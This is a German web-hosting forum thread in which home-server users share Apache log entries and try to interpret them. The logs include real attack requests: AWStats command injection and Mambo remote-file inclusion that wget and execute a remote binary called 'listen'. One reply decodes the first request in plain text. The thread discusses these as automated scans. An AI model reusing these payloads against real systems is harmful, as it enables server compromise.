kostenloser Webspace werbefrei: lima-city


localhost logs

lima-cityForumSonstigesSpam und sonstiges Unvergütetes

  1. Autor dieses Themas

    phattek

    Kostenloser Webspace von phattek

    phattek hat kostenlosen Webspace.

    Ich hab heute Lokal mal den Webalizer getestet. Dabei ist mir aufgefallen, dass des ?fteren versucht wird von extern auf mein Rechner zuzugreifen. Aber noch interessanter sind diese eintragungen in der access.log:
    211.90.162.130 - - [09/Dec/2005:18:41:46 +0100] "CONNECT 65.54.190.179:25 HTTP/1.1" 403 365 "-" "-"

    211.90.162.130 - - [09/Dec/2005:18:41:47 +0100] "GET http://www.ebay.com/ HTTP/1.1" 403 364 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"

    66.34.225.186 - - [18/Dec/2005:18:52:47 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 403 382 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

    66.34.225.186 - - [18/Dec/2005:18:52:52 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 403 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


    Jemand ne Ahnung, was das bedeutet? Ich meine ich bin doch nicht ebay!
  2. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

  3. Die "EBay-Anfrage" d?rfte dadurch zu Stande gekommen sein, dass jemand

    http://phatteks.homepage.de/http://www.ebay.com in die Adresszeile seines Browser getippt hat. Falls das nicht gehen sollte, hat er es mit einem Browser-Simulations-Tool geschickt (wget, Perl::LWP, ...).

    Auch der folgende Eintrag sieht so aus, als ob sich jemand von au?en an deinen Statistiken zu schaffen machen wollte oder eine Sicherheitsl?cke getestet hat.
  4. Ich vermute mal, dass jemand versucht hat deine FTP Einstellungen zu ?berschreiben.
    Auf jeden Fall scheint der jemand Ahnung davon zu haben.
    Du solltest sicherheitshalber mal deine TP einstellungen nachschauen und deine Passw?rter ?ndern.

    MfG Lucas
  5. Autor dieses Themas

    phattek

    Kostenloser Webspace von phattek

    phattek hat kostenlosen Webspace.

    @alopex: Wenn dass jemand so eingetippt h?tte, w?re noch ein Slash vorne dran:
    127.0.0.1 - - [02/Jan/2006:19:58:26 +0100] "GET /http://www.ebay.com HTTP/1.1" 404 376 "-" "Mozilla/5.0 (X11; U; Linux i686; rv:1.7.8) Gecko/20050513 Debian/1.7.8-1"

    Naja, ich habe gar keinen ftp-Server installiert. Das ist ja nur mein ganz normaler Rechner.
  6. Die Anfrage-URL nach der mit ebay.com mal dekodiert:

    /awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 216.15.209.12/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|

    Die IP-Adressen:
    216.15.209.12 => 123go.ca
    216.102.212.115 => adsl-216-102-212-115.buytheelection.com


    Nur weil der Typ den Pipe-Operator schon mal gesehen hat, hei?t das noch lange nicht, dass er Ahnung hat.^^

    Ich w?rde eher auf eine ?bliche Probier-Attacke eines Script-Kiddies tippen.
  7. Autor dieses Themas

    phattek

    Kostenloser Webspace von phattek

    phattek hat kostenlosen Webspace.

    Ich frag mich blo?, wieso der durch probieren gerade auf meine IP kommt. Ich hab doch nur Modem und dann geht meine ganze Geschwindigkeit noch an irgendwelche Script-Kiddies ...
  8. Die klappern einfach automatisiert irgendwelche Adressblocks ab. Irgendwo steht schon ein Server, der drauf reagiert. Deiner d?rfte schon wegen der Antwortgeschwindigkeit nach der ersten Anfrage durchs Raster fallen ...
  9. Autor dieses Themas

    phattek

    Kostenloser Webspace von phattek

    phattek hat kostenlosen Webspace.

    .. au?erdem kann auf meinen http-Server und auf meinen mysql-server nur lokal zugegriffen werden. aber meinen mailserver m?sste ich mal sch?tzen ...

    p.s. hat jemand ne ahnung wie ich exim4 vor dem zugriff von au?en sch?tzen kann?

    Beitrag ge?ndert am 2.01.2006 20:19 von phattek
  10. Der Thread hat mich auf die Idee gebracht auch mal wieder die Logs durchzugehen, da ich das seit Ewigkeiten nicht mehr gemacht hab...

    Aber ein bisschen hat es mich schon erstaunt das ich ziemlich schnell f?ndig werde... sieht irgendwie so aus als h?tte da jemand einfach mal ein paar Sachen ausprobiert ob diese existieren. Gibts da bots oder sowas die einfach irgendwelche ips durchgehen?

    [Mon Jan 02 18:03:00 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/awstats
    [Mon Jan 02 18:03:01 2006] [error] [client 218.232.109.223] script not found or unable to stat: D:/server/apache2/cgi-bin/awstats.pl
    [Mon Jan 02 18:03:03 2006] [error] [client 218.232.109.223] script not found or unable to stat: D:/server/apache2/cgi-bin/awstats
    [Mon Jan 02 18:03:04 2006] [error] [client 218.232.109.223] script 'D:/server/www/xmlrpc.php' not found or unable to stat
    [Mon Jan 02 18:03:05 2006] [error] [client 218.232.109.223] client denied by server configuration: D:/server/www/blog/xmlrpc.php
    [Mon Jan 02 18:03:07 2006] [error] [client 218.232.109.223] client denied by server configuration: D:/server/www/blog/xmlsrv/xmlrpc.php
    [Mon Jan 02 18:03:09 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/blogs
    [Mon Jan 02 18:03:10 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/drupal
    [Mon Jan 02 18:03:12 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/phpgroupware
    [Mon Jan 02 18:03:13 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/wordpress
    [Mon Jan 02 18:03:13 2006] [error] [client 218.232.109.223] script 'D:/server/www/xmlrpc.php' not found or unable to stat
    [Mon Jan 02 18:03:16 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/xmlrpc
    [Mon Jan 02 18:03:17 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/xmlsrv


  11. tuvok schrieb:
    Der Thread hat mich auf die Idee gebracht auch mal wieder die Logs durchzugehen, da ich das seit Ewigkeiten nicht mehr gemacht hab...

    Aber ein bisschen hat es mich schon erstaunt das ich ziemlich schnell f?ndig werde... sieht irgendwie so aus als h?tte da jemand einfach mal ein paar Sachen ausprobiert ob diese existieren. Gibts da bots oder sowas die einfach irgendwelche ips durchgehen?

    [Mon Jan 02 18:03:00 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/awstats
    [Mon Jan 02 18:03:01 2006] [error] [client 218.232.109.223] script not found or unable to stat: D:/server/apache2/cgi-bin/awstats.pl
    [Mon Jan 02 18:03:03 2006] [error] [client 218.232.109.223] script not found or unable to stat: D:/server/apache2/cgi-bin/awstats
    [Mon Jan 02 18:03:04 2006] [error] [client 218.232.109.223] script 'D:/server/www/xmlrpc.php' not found or unable to stat
    [Mon Jan 02 18:03:05 2006] [error] [client 218.232.109.223] client denied by server configuration: D:/server/www/blog/xmlrpc.php
    [Mon Jan 02 18:03:07 2006] [error] [client 218.232.109.223] client denied by server configuration: D:/server/www/blog/xmlsrv/xmlrpc.php
    [Mon Jan 02 18:03:09 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/blogs
    [Mon Jan 02 18:03:10 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/drupal
    [Mon Jan 02 18:03:12 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/phpgroupware
    [Mon Jan 02 18:03:13 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/wordpress
    [Mon Jan 02 18:03:13 2006] [error] [client 218.232.109.223] script 'D:/server/www/xmlrpc.php' not found or unable to stat
    [Mon Jan 02 18:03:16 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/xmlrpc
    [Mon Jan 02 18:03:17 2006] [error] [client 218.232.109.223] File does not exist: D:/server/www/xmlsrv

    Mit Sicherheit.
    Wahrscheinlich ein Script, dass wie alopex ansprach, einfach einen Adresseblock scannt und bei Servern die auf den Ping anspringen die Dateien abfragt, weil anscheinden bei awstats ein Fehler ist, den man ausnutzen k?nnte.

    MfG Lucas
  12. Jo, danke :)
    Bins mal genauer durchgegangen und hab nur solche Sachen gefunden... dabei ist mir aber noch was aufgefallen was ich nicht nachvollziehen kann.

    64.12.165.33 - - [29/Dec/2005:19:15:36 +0100] "\x05\x01" 501 288
    64.12.165.33 - - [29/Dec/2005:19:15:36 +0100] "CONNECT 64.12.165.56:6666 HTTP/1.0" 405 314
    64.12.165.33 - - [29/Dec/2005:19:15:36 +0100] "POST http://64.12.165.56:6666/ HTTP/1.0" 404 287

    und im error log

    [Thu Dec 29 19:15:37 2005] [error] [client 64.12.165.33] Invalid method in request \x05\x01
    [Thu Dec 29 19:15:38 2005] [error] [client 64.12.165.33] Attempt to serve directory: D:/server/www/


    Scheint irgendwas von/mit Icq zu sein
    Apache/1.3.29 Server at irc-m08.icq.aol.com Port 80
  13. r*****r

    mr sind da auch ein paar eintra??ge aufgefalle, in der log vom janaserver :biggrin: :

    als link, da des immer mehr wurde, was ich gefunden habe:
    http://ruehrer.xardas.lima-city.de/log-jana.txt


    Edit:

    wenn die w?ssten,was alles in den Logfiles auftritt ;)

    Edit 2:
    hm, interresant, sollte man nur noch die sprache beherschen ;):
    http://80.55.67.114/

    Beitrag ge?ndert am 3.01.2006 00:23 von ruehrer

    Beitrag ge?ndert am 3.01.2006 00:29 von ruehrer
  14. Autor dieses Themas

    phattek

    Kostenloser Webspace von phattek

    phattek hat kostenlosen Webspace.

    ruehrer schrieb:
    Edit 2:
    hm, interresant, sollte man nur noch die sprache beherschen ;):
    http://80.55.67.114/

    Hmmm, ich hab ein Programm, was Totem hei?t:

    Totem 0.100
    Movie Player using xine-lib version 1.0.0
    Copyright ? 2002-2004 Bastien Nocera


    Aber hat hier jemand einen Plan, wie man exim4 so einrichten kann, dass sich Benutzer authentifizieren m?ssen bzw. dass der Host localhost sein muss.
  15. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

Dir gefällt dieses Thema?

Über lima-city

Login zum Webhosting ohne Werbung!